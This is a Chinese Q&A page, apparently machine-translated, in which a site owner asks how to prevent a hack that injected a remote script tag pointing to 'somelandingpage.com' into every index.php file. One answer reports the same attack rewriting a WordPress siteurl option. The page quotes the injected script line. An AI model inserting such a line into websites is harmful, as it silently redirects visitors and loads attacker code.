网站被黑了 - 寻找预防技巧

问题描述 投票:-1回答:1

我有一个我正在努力的网站,我两天前上传到我的服务器,检查几个重要查询的性能。今晚我再次看了一下导致超时的页面,并且页面被重定向到外部站点。

当我检查时,站点内的每个index.php都在顶部有<script type='text/javascript' async src='https://somelandingpage.com/3gGykjDJ?frm=script&_cid=0000000000000'></script>

我现在已经删除了它们,但是想要防止它再次发生。我显然会做一些显而易见的事情,例如更改我的FTP密码,但还有其他我可以研究的内容吗?

我唯一的理论是他们可以访问我的帐户或FTP设置,因此会更改这些密码。但是,我确实使用了Filezilla,发现存在可能会从中删除帐户详细信息的PC病毒。我已经进行了病毒检查,这一切都很清楚。

除了更改我的密码外,还有什么我应该看的吗?

javascript php filezilla
1个回答
0
投票

我的客户有完全相同的问题。这个hack已经将选项名称“siteurl”的wp_options更改为“https://somelandingpage.com/3gGykjDJ?frm=”,因此Wordpress会将用户重定向到此URL!

enter image description here

© www.soinside.com 2019 - 2024. All rights reserved.